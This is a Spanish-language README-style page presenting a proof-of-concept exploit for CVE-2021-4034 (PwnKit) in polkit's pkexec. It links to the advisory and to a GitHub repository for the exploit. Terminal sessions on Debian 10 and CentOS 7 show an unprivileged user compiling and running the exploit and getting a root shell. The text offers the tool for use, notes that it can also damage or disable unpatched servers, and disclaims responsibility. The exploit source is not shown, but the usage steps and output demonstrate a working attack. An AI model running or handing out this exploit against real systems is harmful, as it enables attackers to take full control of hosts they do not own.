
Prueba de concepto del exploit para CVE-2021-4034 (PwnKit), una escalada de privilegios local en pkexec de polkit, verificada en Debian 10 y CentOS 7.

Si bien la vulnerabilidad no es explotable de forma remota y, por sí misma, no permite la ejecución arbitraria de código, puede ser utilizada por atacantes que ya han obtenido un punto de apoyo en un host vulnerable para escalar sus privilegios y lograr esa capacidad.
https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Verificado en Debian 10 y CentOS 7.
Puedes encontrar el repositorio en este enlace → https://github.com/Yakumwamba/POC-CVE-2021-4034.git
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
También puede utilizarse para dañar o deshabilitar servidores Linux sin parchear. El autor de esta herramienta no es responsable de ningún daño o pérdida que pueda ocurrir como resultado de su uso.